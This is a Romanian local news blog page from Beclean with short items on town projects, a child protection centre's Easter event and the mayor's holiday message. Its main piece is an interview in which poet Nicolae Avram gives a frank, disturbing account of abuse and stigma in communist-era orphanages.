În programul artistic au luat parte și elevi ai Centrului pentru Protecția Copilului Beclean. Despre ei nu s-a amintit nimic. Că ar fi existat. Nici măcar în deschiderea oficială a manifestării. Probabil din cauza emoțiilor. Cine știe?!. Pe la ora 12,00 a început un worshop cu tema : “ Promovarea și protecția drepturilor cu dizabilități “. Au participat senatorul PSD Ioan Deneș, vicepreședintele Consiliului Județean, Ioan Pugna, viceprimarul Becleanului Mathe Ștefan, directorul Colegiului “Petru Rareș” Beclean, Cristian Nicula Și alții.

S-a vorbit și despre desființarea acestor școli incluzive. În acest sens există o lege ce a trecut deja de senat. Totul se bazează pe integrarea copiilor cu dizabilități în învățământul de masă și crearea unor centre de abilitare și de educație timpurie. Senatorul Ioan Deneș a promis că va lămuri problema.

PRIMARUL NICU MODOVAN VA TRANSFORMA ALEEA GĂRII ÎNTR-O PIAȚĂ MODERNĂ

written by J de S | 17/08/2014

Un proiect de mare importanță aflat pe agenda de lucru al primarului Nicu Moldovan este modernizarea centrului orașului de pe malul Someșului Mare, centru care va fi transformat în totalitate într-un modern centru civic al localității. Planurile administrației locale de reamenajare a centrului orașului Beclean din punct de vedere arhitectonic și urbanistic se apropie cu pași repezi de momentul când va fi dat startul lucrărilor.

Există trei puncte de reper în ceea ce privește reconstrucția centrului orașului. Primul reper este biserica reformată și spațiul din jurul acesteia, unde se va interveni la toate nivelurile urbanistice, spații verzi, rondouri cu flori, amenajări peisagistice, fântâna arteziană.

O etapă importantă este reprezentată de modernizarea parcului orașului. Aici vor exista sisteme noi de irigații, spații verzi și amenajări peisagistice spectaculoase, aranjamente florale multicolore, băncuțe, locuri de joacă pentru copii. Cel de-al treilea reper în remodelarea centrului este piața mică, acolo unde va fi și noul sediu administrativ al orașului Beclean, care dup[ toate probabilitățile va fi inaugurat în toamna acestui an.

Nu trebuie să uităm de Aleea Gării care va fi transformată într-o modernă piață centrală al orașului. Trebuie să se știe că toate aceste transformări vor fi realizate treptat, în mai multe etape, de-a lungul anilor 2014, 2015 și începutul lui 2016, atunci când toți beclenarii, precum și toți cei care vor vizita orașul de pe Someș vor putea vedea o altă față a centrului orașului Beclean.

ANDRA ROTARU, ÎN DIALOG CU NICOLAE AVRAM ÎN HYPERION, NR.1-2-3 / 2014 :

written by J de S | 17/08/2014

„Crima este fără început și fără sfârșit”

În 2013, la Casa de editură Max Blecher, în colecția “Plantații” a apărut volumul de poezie “All Death Jazz”, de Nicolae Avram. “All Death Jazz relevă fațetele inepuizabile ale unor dezmoșteniți ai soartei în care, deși nu ne vine ușor, sfârșim prin a ne recunoaște pe noi înșine.” (O. Nimigean) Acesta este primul interviu publicat de Nicolae Avram:

“All Death Jazz” continuă volumul anterior, „Federeii”. Ce a rămas nespus?

Să ne înțelegem : Federeii și All Death Jazz nu sunt decât niște povești. E adevărat, puse în versuri. Când am fost mic, am fost fascinant de Șeherezada. Se știe, ca să nu fie decapitată, regina începe să-i spună proaspătului soț o poveste. Poveste pe care o întrerupe la răsăritul soarelui.

Acum, s-a pus problema dacă voi mai putea continua acest spectacol grotesc – lilial. Violent-fascinant. Dacă, vorba prietenului Ștefan Manasia: „va mai putea să plonjeze în lumea teribilă a federeului”. S-a mers până acolo încât, mi s-a cerut să-mi schimb registrul liric, să regăsesc altfel poezia. În Cântece de sinucigaș(2000) și în Litanii pentru diavol (2006) am încercat să fiu liric. Să pun mască lucrurilor. Podoabe. Tinichele. „Publicate în anii scrierii lor (până în 1990), nu ar fi fost cu nimic mai prejos decât lirica neoexpresionistă a unor Ion Mureșan, Viorel Mureșan, Ion Cristofor”, crede același nemuritor Ștefan Manasia.

Cântece de sinucigaș au fost scrise în perioada adolescentei mele la casa de copii. Au fost citite în cenaclul Saeculum de la Beclean. Manuscrisul a fost girat de regretatul Radu Săplăcan. A câștigat numeroase premii , printre care trei premii naționale. Cu toate astea, deși în `97 a luat premiul editurii Augusta (Timișoara) la Festivalul de poezie „Nicolae Labiș” de la Suceava, manuscrisul a văzut lumina tiparului abia în 2000 la o editură obscură. În 2000, în poezie , lucrurile au început să se schimbe. Apăruseră teribilii douămiiști. Eu veneam, se pare, cu o poezie obosită.

Cu Federeii nu am făcut altceva decât să răsucesc, la sugestia poetului, maestrului și prietenului O. Nimigean, căruia îi sunt recunoscător, cât mai adânc și fără patetism, cuțitul în rană. Am dat la o parte imaginile și am coborât în bolgie. Am lăsat să iasă la iveală monstruozitatea goală, directă, necosmetizată, din casele de copii ale comunismului românesc. Din care am făcut parte.

În acele vremuri de demult, moartea lua diferite forme și venea de peste tot: dinspre adulții care ar fi trebuit să aibă grijă de copii, dinspre oglinzi, dinspre „prăjiturelele dulci de mălai” etc. Moartea era la fel de prezentă ca viața, trăia la egalitate cu ea.

În acele vremuri, moartea era ceva normal ca și împuțitele macaroane cu brânză pe care le primeam aproape în fiecare seară la orfelinat. Chiar din primele zile am auzit tot felul de povești. Cu fete răpite, violate în păduri, în peșteri, cu băieți bătuți și dați de haleală câinilor. Milițienilor.

Când am reușit să-mi deschid ochii, moartea era deja pretutindeni. Sub diferite forme. Îmi amintesc o zi friguroasă de iarnă. Să fi avut vreo zece ani. Stăteam cu băieții pe coridoare. Ne jucam. Cineva făcuse rost de câteva chibrituri. Am ieșit afară și am aprins în spatele clădirii un foc de cartoane. Un băiat mare s-a apropiat pe nevăzute de noi și l-a pălit pe unul dintre băieți, care stătea ghemuit în jurul focului, cu o piatră drept în moalele capului. Copilul s-a prăbușit sub o băltoacă de sânge. Câteva zile mai târziu am auzit că băiatul lovit în cap a fost dus la spital. Și că s-a făcut bine. Eu de atunci nu l-am mai văzut niciodată.

După educatori, pedagogii și băieții mari făceau legea în orfelinat. De la lustruitul podelelor până la a sta capră sau a lua muie, nu era decât un pas. Frumusețea era că torționarii noștri știau să pună ditamai cearceaful pe țambal. Fiind copil nu puteam protesta. În fața bestiilor nu era altă soluție decât să-ți pleci capul și să ridici mâinile.

Spaima, frica, trauma erau așa de mari încât unii orfelini și-au pierdut mințile. După „eliberare”, nu au reușit niciodată să se integreze în societate. Mulți au înfundat pușcăria. Alții, nici după 20 de ani de la ieșirea de la casa de copii nu au o casă. Sunt la mila primăriilor și rătăcesc pe stradă după o bucată de pâine.

Autenticitatea din “All Death Jazz” generează multiple fațete, care se extind unele dintr-altele.

În poezie și nu numai, să fii autentic înseamnă să fii tu însuți. Crud și neiertător. Cu Federeii și All Death Jazz mi-am descoperit propria voce. Poezia se naște din adevărul trăit. Fără sentimentalisme și lamentări de doi bani. Am scris All Death Jazz fără teama că am să fiu judecat sau criticat. Știind că nu am ce să pierd. În All Deth Jazz, omul e pervers. Monstruos. Anormal. Vinovat fără să fi greșit cu nimic. Vinovat pentru că a crescut într-o casă de copii. Comunistă. Într-un sistem totalitar.

Isus și-a pierdut autenticitatea în momentul în care s-a dat pe sine preț de răscumpărare.

În All Death Jazz, lucrurile sunt duse mai departe decât în Federeii. A trebuit să fac asta, deoarece riscam să mă repet. Am introdus a treia voce. Trei registre poetice diferite,care o fac „polifonică și seducătoare ca un roman” (Ștefan Manasia). „Poezia se obține, înainte de toate, prin duritate și nuditate stilistică” (Daniel C. Enache).

Volumul este mult mai îngrijit și mai „filtrat liric” ( Emanuel Modoc ). Mai mult decât atât,am renunțat, deși pare ciudat, la poezie. Sub aceste fațete de care vorbești, Andra, am vrut ca cititorul să descopere această alternanță între grotesc și lilial, între sublim și abject. Între fascinant și ciudat. Am vrut să descopere, în ultimă instanță, ceea ce este mai luminos din partea întunecată. Din noi înșine.

Percepția celorlalți despre federei are șanse să fie schimbată? De ce stigmatul întrece valoarea umană?

Pentru foarte multă lume, a fi de la casa de copii e similar cu borfaș, țigan, păduchios. Handicapat. La școală și pe stradă, oamenii ne arătau cu degetul. În societate, toate sunt bune și frumoase, până află că ești de la casa de copii. Foști colegi de-ai mei și-au ascuns statutul de federeu. De rușine. Trăiesc toată viața cu frica asta în sân. Cu această pată. De parcă ar fi omorât pe cineva. Ca și Oedip.

La lucru, în familie, între prieteni, toate greșelile se pun pe seama că „ești de la casa de copii”. După zece ani de căsnicie, o federiță a trebuit să-și ia lumea în cap, pentru că bărbatul ei a aflat că „e de la casa de copii”. De atunci nu a mai scos-o din sărăntoacă, curvă, vacă ordinară. Împuțită. Și asta după ce i-a dăruit doi copii.

Un federeu ajunge să trăiască o viață paralelă. Pe de o parte, va trebui să suporte viața fără să se plângă, pe de altă parte, este nevoit să-și retrăiască coșmarurile. În tăcere. Pentru că nu va fi înțeles de nimeni.

A pune fierul roșu pe gâtul unor copii discreditează. Devalorizează. Discriminează. Pentru că oamenii se tem. Pentru că sunt ignoranți. Pentru că religia e parvenire și convingerile morale sunt făcute praf.

Percepția, dacă are șanse să fie schimbată? Are, cu condiția ca aproapele să devină un mic Dumnezeu.

“pentru o clipă am crezut că dragostea/m-a vindecat ziua m-am transformat iarăși/ în porc”, scrieți într-un poem. Existau și constante în perioada aceea a „federeismului”?

Paradoxul este că federeu rămâi toată viața. Te naști și mori federeu. În perioada aceea, dragostea era cel mai înspăimântător și mai abject lucru. Dar și cel mai plin de poezie. Era în stare să vindece cele mai atroce dureri. Dar și să le adâncească. Să te facă una cu țărâna. Un federeu suporta orice. Bătăi. Umilințe. Foame. Un singur lucru nu-i plăcea: să-i furi dragostea. Mama aceea care l-a abandonat pe un peron de gară într-o valiză sau care l-a aruncat în tomberonul de gunoi.

Aveam vreo opt sau nouă ani când un orfelin făcuse rost de o fotografie cu o actriță. Credea că e mama lui. Dormea cu fotografia sub cap. Mânca cu ea sub farfurie. De teamă să nu i-o fure cineva. Era extaziat. Când prindea câteva minute libere, dădea fuga la poarta orfelinatului, în speranța că mama aceea din fotografie are să vină să-l vadă. Are să-l ducă acasă. Într-o dimineață fotografia a dispărut. Câteva zile mai târziu l-am întâlnit în curtea orfelinatului. Plin de sânge. Avea ochii scoși.

Și apoi nu înțelegeam, în acele vremuri, de ce iubitele noastre cădeau în plasa celor care trebuiau să aibă grijă de noi, de ce străinul care aducea un sac de boarfe drept „ajutor”, prefera fetițe la micul dejun, de ce băieții mari ne băgau mâna în chiloți? De ce, ca loc de joacă, preferam țintirimurile? Au trebuit să treacă ani de zile ca să înțeleg că toate acestea se întâmplau fiindcă suntem oameni. Fiindcă semănăm. Crimei.

Din păcate, singura constantă în perioada aceea a federeismului era moartea.

„ce este patria mama tata”?

Patria-i pita cu usturoi mama curvă tata porc beat. Parcă așa ziceam în All Death Jazz. Din câte îmi amintesc, în acele vremuri, roiau prin casa de copii tot felul de oameni ciudați. De obicei îmbrăcați în negru. Noi, copiii, le zicem moartea.

Într-o după-amiază, în timpul orelor de meditație, educatorul nostru care ieșise chemat la telefon, intră în grupă cu doi oameni din aceia siniștri. Moartea în carne și oase. Foarte precipitat, educatorul ne spune să ne pregătim de dictare. Noi, copiii, rupem o foaie din caietul de dictare și așteptăm. Îngroziți. Educatorul zice: răspundeți ce este patria, mama, tata? Eu, cel puțin, nu am auzit niciodată de cuvintele astea: patria. Mama. Tata. Ne uitam ca proștii unul la altul. Singura mamă pe care o știam cu toții era tovarășa Elena Ceaușescu, mamă, iubită, eroină, savantă de renume mondial. Tata: tovarășul Nicolae Ceaușescu, cel mai iubit fiu al poporului, geniu strateg al națiunii. Peste ani, scotocind după o revistă prin biroul educatorului, am dat într-un sertar pe care l-am descuiat cu un briceag, peste lucrările noastre de dictare. De atunci.

Despre patrie am auzit prima dată când, cu gașca, am șterpelit dintr-o biserică, mai multe pâini și o sticlă de vin care se aflau într-un coș cu nuiele. În fața altarului. Împodobit cu sălcii înflorite. Ca să nu fim prinși, am fugit pe dealuri și, în timp ce ascultam poveștile uluitoare ale unui prieten al cărui bunic luptase în al doilea război mondial, mâncam, uitându-ne la luna nouă, pâine cu usturoi sălbatic. Și beam vin.

Ce ați găsit dincolo de ziduri?

Credeam, ca orice orfelin, că am să găsesc o lume mai bună. Din păcate, am găsit străzi pustii, murdare și prăfuite, pe care le băteam zi de zi. După ce ieși de la casa de copii, statul nu te mai ajută cu nimic. De câte ori mă întorceam serile obosit și flămând,găseam poarta orfelinatului închisă. Nu o dată, am primit în loc de adăpost sau o bucată de pâine, un picior în fund și înjurături.

În primul an am dormit într-o căpiță de fân de pe malul râului Someș. Alături de un câine. De multe ori mă ascundeam în cimitir, fiindcă nu aveam de lucru. Căutam compania morților. Cel puțin erau singurii din partea cărora primeam răspunsuri. Ceașcă nu concepea să umbli hai-hui pe străzi. Fără să ai un loc de muncă. Te săltau tablagiii și îți făceau, cât ai zice pește, dosar pentru canal. Era în anul 1985. Ce altceva puteam găsi decât foamete, frică, dominație, minciună, frig, singurătate, boli, întuneric, tiranie, moarte, alienare, nebunie. Dar, despre toate astea, într-un viitor roman. Gata pregătit. Pentru tipar.

COPIII DE LA CENTRUL PENTRU PROTECȚIA COPILULUI BECLEAN AU CELEBRAT ÎNVIEREA DOMNULUI

written by J de S | 17/08/2014

Copiii de la Centrul pentru Protecția Copilului din urbea de pe Someș au marcat momentul Învierii Domnului, cea mai importantă sărbătoare a creștinătății. Astfel copiii de la apartamentul 5, educatori : Alina Pop, Klara Ecsedi, Pompei Mocodean, Ersila Toma, au oferit celor prezenți scurte momente artistice prin care au marcat sărbătoarea Învierii.

După programul artistic muzical–literar emoționant, conducerea centrului a ales să sărbătorească ziua de naștere a copiilor născuți în luna aprilie printr-o felie de tort, suc și voie bună. Ingredientele necesare pentru prepararea tortului au fot sponsorizate de părintele Timoftei Găurean de la parohia Agrieș comuna Târlișua, din protopopiatul Beclean, părinte Protopop de Beclean, Doru Zimveliu. De altfel părintele Timoftei Găurean este cunoscut prin faptul că a reușit să adune în casa parohială lucruri vechi ale țăranilor de altădată, transformând-o într-un lăcaș de suflet și cultură.

Au dorit să fie prezenți alături de copiii, Sânziana Săsărman, șef Centru pentru Protecția Copilului Beclean și scriitorul Nicolae Avram, șef al Serviciului Contabilitate,Salarizare Administrativ din cadrul Centrului pentru Protecția Copilului Beclean.

MESAJUL PRIMARULUI NICU MOLDOVAN CU OCAZIA SĂRBĂTORILOR DE PAȘTI

written by J de S | 17/08/2014

Nicu Moldovan le urează beclenarilor să aibă sărbători fericite alături de cei dragi. Iată mesajul întreg al edilului din Beclean :

Cu prilejul Sfintelor Sărbători de Paști, cea mai mare sărbătoare a întregii creștinătăți vom fi, ca în fiecare an, cu toții în mijlocul familiilor noastre, alături de cei dragi, pentru a ne bucura de Sfînta Sărbătoare a Învierii Mântuitorului Nostru, Iisus Hristos.

Vă doresc ca acest moment deosebit, sărbătorit de întreaga lume creștină, să vă aducă în case și în suflete lumină și bucurie, să vă dea puterea și speranța de care aveți nevoie pentru a trece cu bine peste orice încercări.

Sărbători fericite tuturor !

Primarul orașului Beclean,

Nicolae Moldovan